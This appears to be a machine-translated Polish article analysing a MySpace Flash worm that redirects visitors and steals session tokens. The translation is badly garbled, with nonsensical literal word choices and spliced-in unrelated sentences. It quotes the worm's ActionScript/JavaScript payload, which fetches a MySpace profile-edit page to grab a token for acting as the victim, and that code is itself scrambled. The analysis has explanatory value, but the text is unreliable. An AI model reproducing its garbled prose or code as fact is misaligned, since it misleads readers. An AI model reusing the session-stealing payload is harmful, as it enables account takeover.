MySpace ma by� zaka�ony przy B�ysk oparty (swf) robak kt�ry rozpi�to�� cen szybko przez MySpace. To jest osadzanie JavaScript kod w u�ytkownik zysk �w przeadresowuje wizytatorzy wobec pewien umiejscowienie ��da� ten U.S. rz�d by� z ty�u ten 9/11 terrorysta atakuje, Symantec ostrzega� poniedzia�ek Jednak�e mo�e by� just wierzcho�ek g�ry lodowej. Let's wzi�� pewien patrze� na jak ono prace wobec rozumie� jak ono mog� by� �atwo zmodyfikowany wobec wyg�osi� du�o dewastowanie �adunek.

Ten nienazwany robak nie jest zrobiony w z�ej intencji opr�cz ten Shockwave B�ysk (.swf) umie�ci� w teczce z dokumentami zawieranie ten �adunek sprzeniewierzy� JavaScript w ten zysk od wszelki MySpace u�ytkownik kt�ry pogl�dy ten .swf umie�ci� w teczce z dokumentami. Ten puszka metalowa �atwo replikaSamy jest m�j przyjaciel robak rezygnowa� �amanie si� pewien zak�ad pracy wyzyskuj�cy robotnik�w.

Ten javascript kod by�by wtedy by� interpretowany przy wszelki u�ytkownik kt�ry odwiedzony ten umiejscowienie, pozwalaj�c zmys�owy dane zosta� skradziony, taki jak pewien sieka� warto�� wymagany w celu wykonania operacje r�wnie pewien u�ytkownik, i spe�nianie operacje na czyj�� korzy�� �w u�ytkownik ( rezygnowa� zgodzi� si� oczywi�cie). Rozpowszechniony, �w dost�p jest trwaj�cy u�ywany tylko wobec rozpi�to�� cen ten JavaScript kod wobec inny zysk od ludowy towarzyski kapita� w�a�cicieli umiejscowienie.

Je�li ten �adunek jest zrobiony w z�ej intencji, ono puszka metalowa wykonywa� drugorz�dny atakuje podobny celowanie �wie�o odkrywa� podatno�� na zranienie wzruszaj�cy Mikroskop Wydzia� nawi�zywa� kontakt. Ten wp�yw by�by by� du�o wy�sza oferta wystawiaj�cy wyr�wnywa� zmys�owy informacja u tw�j twardy- dysk.

Let's wzi�� pewien patrze� na ten robak, dzi�ki badanie przykinematic.theory:

Podczas ty odwiedzony an ju� zaka�ony stronica, tu jest pewien B�ysk sprzeciwia� si� osadzony ("redirect.swf") kt�ry nawi�zywa� kontakt ten actionscript:
wygl�d("url");

Ono otwiera i przeadresowuje ty do sporz�dzi� specyfikacje blog URL.

U ten blog url tu jest inny b�ysk umie�ci� w teczce z dokumentami osadzony "retrievecookie.swf". Ono nawi�zywa� kontakt:

getURL("javas\n\rcript: var x = nowy ActiveXObject'Msxml2.XMLHTTP'x.open'GET','http(\\);(\\\:/editprofile.myspace.com/index.cfm?/fuseactionuser.HomeCommentsfriendID93634373',truex.onreadystatechangefunctionif=&=\);=(){ (x.readyState4var==){ pgx.responseTextvar=; scpg.substringpg.indexOf'BX=((\-\'3,pg.indexOf')+(\-EX'whilesc.indexOf'\));(((\
\')!=-1)||(sc.indexOf(\'-XXX\')!=-1var)){ nsc.indexOf'=(\
\'ifn);(==-1nsc.indexOf')=(\-XXX'scsc.substring0,nsc.substringn5,sc.length\);=()+(+);};" + " ocenia�();}};" + "x.sendnull();", "");

Ono otwiera inny blog wys�a� poczt�(ogniwo) i oszacowany jego tre��.

Ten kod dostaje tw�j MySpace sieka� kt�ry pozwala kto� wyst�pi� ty u MySpace i wype�nia� wszelki operacje u tw�j korzy�� podobny wymiana tw�j has�o albo dodawanie kto� nieznany r�wnie tw�j przyjaciel, co� mo�esz czyni� u MySpace. Rozpowszechniony ten kod dodaje pewien przekaz wobec tw�j MySpace zysk. Ono obszernie u�ywa� AJAX pod k�tem jego operacje.